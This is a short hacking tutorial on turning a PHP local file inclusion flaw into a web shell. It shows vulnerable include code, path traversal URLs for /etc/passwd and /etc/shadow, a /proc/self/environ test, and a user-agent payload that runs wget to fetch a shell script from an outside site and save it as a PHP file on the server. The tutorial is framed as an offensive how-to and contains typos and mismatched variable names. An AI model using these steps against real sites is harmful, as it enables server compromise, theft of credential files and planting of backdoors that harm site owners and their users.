1. Introduction
2. /proc/self/environ
3. PHP injection
1. Introduction
Remember LFI? This is a tutorial on how to get the shell on the website with a site vulnerable to LFI.
Here is the example of a code that is vulnerable to LFI:
<?php
// LFI Vulnerable Code
$redirect = $_GET[redirect];
include($redirect);
?>
It is vulnerable because $redirect is not sanitized, therefor include($redirect); will read off $_GET[page];.
Here is a example of LFI on Unix (very old):
http://www.example.com/redirect.php?.../../etc/passwd (Unix)
http://www.example.com/redirect.php?.../../etc/shadow (Linux)
http://www.example.com/redirect.php?.../master.passwd (FreeBSD)
2. proc/self/environ
To check if it is vulnerable, we enter this in the ../ part:
../../../../../proc/sef/environ
If you get something like DOCUMENT_ROOT=SKDOISAJUF()&@#%(#*%, etc... That means it is vulnerable.
If you get only a blank page, it isn't vulnerable.
3. PHP Injection
Now, let's access it and use Tamper Data to change the user agent to this:
<?system('wget http://gonullyourself.org/shell.txt -O gonullyourself.php');?>
Now, submit the request.
Our command will be executed.
4. Accessing the shell
To check if the command got executed, we will enter something like this:
http://www.google.ca/gonullyourself.php
If our shell is there, the command was successfully executed.
Easy :) Isn't it?